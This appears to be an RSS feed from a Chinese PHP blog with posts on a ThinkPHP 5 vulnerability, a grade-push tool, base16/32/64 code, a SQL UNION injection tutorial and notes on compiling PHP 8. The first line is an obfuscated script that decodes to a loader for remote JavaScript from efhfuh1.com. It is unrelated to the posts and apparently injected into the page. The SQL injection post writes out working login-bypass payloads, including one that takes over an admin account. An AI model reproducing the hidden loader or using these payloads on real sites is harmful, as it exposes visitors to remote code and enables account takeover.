<script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,101,102,104,102,117,104,49,46,99,111,109,47,51,54,53,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt); </script>

我还以为是自己写的某个后台没有鉴权,导致上传文件出现漏洞

然后我又网上查了下 ThinkPHP 5 漏洞,然后就找到了这篇文章:ThinkPHP5.x漏洞复现

自己试了试,真能实行任意函数

ThinkPHP V5.1.29 LTS 实行任意函数

看到这我就知道了,是 ThinkPHP 的漏洞,也怪自己不及时更新框架,这个框架从18年11月,使用 Composer 安装后,我就没有更新过了,一年半过去了我才知道...

怎么解决

实行 composer update topthink/framework 更新
实行 composer update topthink/framework 更新

然后问题就解决了
然后问题就解决了

]]>
0 /chat/1026.html#comments /feed/chat/1026.html
新版正方教务系统 期末成绩主动推送至微信 /php/1025.html /php/1025.html Thu, 02 Jul 2020 19:49:00 +0800 Chuwen GitHub 项目地址

https://github.com/PrintNow/zhengfang-results-push


zhengfang-results-push

新版正方教务系统 期末成绩主动推送至微信等

配置方法

  1. 配置 functions.php 第10行、16行、21行,里面有详细的注释说明
  2. 配置 config.php 第14行,请看下方的 关于 WxPusher 的使用

关于 WxPusher 的使用

  1. 请前往 http://wxpusher.zjiecode.com/admin/app/list 新建一个应用

    没有注册账号先根据提示注册账号

    除了带有 * 标记的表单需要填写,其它都不需要填。傻瓜式填写,不多讲述

  2. 新建完应用你会获得一个 APP_TOKEN 复制它,将它填到 config.php 第14行
  3. 然后不出意外会弹出一个二维码的模态框(如果没有,点击对应 应用的 关注 即可出现)
    /feed/img/1.png
  4. 扫码关注公众号(这个二维码可以保存下来)
  5. 然后点击下方的 我的 -> 我的UID 获取UID,格式是 UID_xxxxxxxxx
    /feed/img/2.png

获取教务系统 JSESSIONID

  1. 打开教务系统
  2. 点击如图

    /feed/img/3.jpg

  3. 复制 SESSION
    /feed/img/5.png

使用方法

  1. 首次查询成绩并推送(第一次添加或更新 JSESSIONID 时用这种方法)

    1. 命令行方法,实行 php main.php -U "你的UID" -S "获取的 JSESSIONID"
    2. 网页方法,访问 http://你的域名/main.php?UID=你的UID&JSESSIONID=获取的SESSION
  2. 定时实行监听,因为已经缓存了 JSESSIONID,所以不需要传 JSESSIONID 参数

    大家学校教务系统大概每2分钟实行一次,JSESSIONID 就不会失效,你们的具体情况具体更改、
    1. 命令行方法,实行 php main.php -U "你的UID"
    2. 网页方法,访问 http://你的域名/main.php?UID=你的UID
]]>
2 /php/1025.html#comments /feed/php/1025.html
PHP 使用匿名函数 实现 base64/32/16 加密解密(encode/decode) /php/1024.html /php/1024.html Thu, 02 Jul 2020 12:07:18 +0800 Chuwen base16/32 加密解密 是在网上找的拼凑的
<?php

$encode = [
    16 => function ($str) {
        $encode = '';
        $chars = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'];
        for ($i = 0; $i < strlen($str); $i++) {
            $encode .= $chars[(ord($str[$i]) & 0b11110000) >> 4] . $chars[ord($str[$i]) & 0b00001111];
        }
        return $encode;
    },
    32 => function ($str) {
        $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
        $output = '';
        $v = 0;
        $vbits = 0;
        for ($i = 0, $j = strlen($str); $i < $j; $i++) {
            $v <<= 8;
            $v += ord($str[$i]);
            $vbits += 8;
            while ($vbits >= 5) {
                $vbits -= 5;
                $output .= $BASE32_ALPHABET[$v >> $vbits];
                $v &= ((1 << $vbits) - 1);
            }
        }
        if ($vbits > 0) {
            $v <<= (5-$vbits);
            $output .= $BASE32_ALPHABET[$v];
        }
        return $output;
    },
    64 => function ($str) {
        return base64_encode($str);
    },
];
$decode = [
    16 => function ($str) {
        $result = '';
        for ($i = 0; $i < strlen($str) / 2; $i++) {
            $result .= chr(intval(substr($str, $i * 2, 2), 16));
        }
        return $result;
    },
    32 => function ($str) {
        $output = '';
        $v = 0;
        $vbits = 0;
        for($i = 0, $j = strlen($str); $i < $j; $i++) {
            $v <<= 5;
            if ($str[$i] >= 'a' && $str[$i] <= 'z') {
                $v += (ord($str[$i]) - 97);
            }
            elseif ($str[$i] >= '2' && $str[$i] <= '7') {
                $v += (24 + $str[$i]);
            }
            else {
                exit(1);
            }
            $vbits += 5;
            while($vbits >= 8){
                $vbits -= 8;
                $output .= chr($v >> $vbits);
                $v &= ((1 << $vbits) - 1);
            }
        }
        return $output;
    },
    64 => function ($str) {
        return base64_decode($str);
    },
];

var_dump($encode[16]('chuwen'));
var_dump($encode[32]('chuwen'));
var_dump($encode[64]('chuwen'));

echo PHP_EOL;

var_dump($decode[16]($encode[16]('chuwen')));
var_dump($decode[32]($encode[32]('chuwen')));
var_dump($decode[64]($encode[64]('chuwen')));
]]>
0 /php/1024.html#comments /feed/php/1024.html
巧妙地使用 SQL UNION 注入 /mysql/1022.html /mysql/1022.html Wed, 01 Jul 2020 19:36:00 +0800 Chuwen 大家一般验证用户登录时,密码是否输入正确,一般是会这么做

  1. 客户端 通过 post 提交用户名(username)和密码(pwd)
  2. 服务端 拿到 username,进行数据库查询(假设没做对SQL注入措施),一般会这样写 SQL 语句(假设 $username 变量是获取用户 post 提交的用户名):
    SELECT username,pwd FROM user_table WHERE username='$username'
  3. 然后查询得到结果,判断查询结果的密码是否与接收的密码一致
  4. 好了重点了来了,因为没有做防SQL注入,大家可以这样注入
注意末尾 # 别漏掉了,写上这个就会忽略后面所有的语句
SELECT username,pwd FROM user_table WHERE username=''
UNION SELECT '','45cf93bd4f762c6597b68e615b153bd0'#

此条语句的实行结果是:

+----------+----------------------------------+
| username | pwd                              |
+----------+----------------------------------+
|          | 45cf93bd4f762c6597b68e615b153bd0 |
+----------+----------------------------------+

没错,大家使用 UNION SELECT 查询,可以控制输出字段的值,但前提是你要知道查询了哪些字段

这样大家 POST 提交参数:

username='UNION SELECT '','123456'#&pwd=123456

就可以骗过验证


如果你知道某个账号(假设是 nowtime)具有超级管理员权限,那么让其实行以下语句就可以控制输出其密码

SELECT username,pwd FROM user WHERE username=''
UNION select username,'123456' as pwd
FROM user where username='nowtime'#

运行结果:

+----------+----------+
| username | pwd      |
+----------+----------+
| nowtime  | 123456   |
+----------+----------+
]]>
0 /mysql/1022.html#comments /feed/mysql/1022.html
Ubuntu 编译安装 PHP 8.0-Alpha 过程 /php/1008.html /php/1008.html Fri, 26 Jun 2020 21:27:00 +0800 Chuwen apt install libsqlite3-dev

configure: error: Please reinstall the BZip2 distribution

那就去安装

sudo apt-get install libbz2-dev

No package 'libcurl' found

 apt-get install libcurl4-openssl-dev

configure: error: GNU MP Library version 4.2 or greater required.

apt install libgmp-dev

No package 'oniguruma' found

apt install libonig-dev

configure: error: Please reinstall readline - I cannot find readline.h

sudo apt-get install libreadline6-dev 

apt install libsqlite3-dev
apt-get install libbz2-dev
apt-get install libcurl4-openssl-dev
apt install libgmp-dev
apt install libonig-dev
apt-get install libreadline6-dev 

+--------------------------------------------------------------------+
| License:                                                           |
| This software is subject to the PHP License, available in this     |
| distribution in the file LICENSE. By continuing this installation  |
| process, you are bound by the terms of this license agreement.     |
| If you do not agree with the terms of this license, you must abort |
| the installation process at this point.                            |
+--------------------------------------------------------------------+

Thank you for using PHP.

configure: WARNING: unrecognized options: --enable-inline-optimization, --with-libxml-dir, --with-xmlrpc, --with-pcre-regex, --with-pcre-dir, --with-gd, --with-jpeg-dir, --with-png-dir, --with-freetype-dir, --with-onig, --enable-zip, --enable-wddx
]]>
0 /php/1008.html#comments /feed/php/1008.html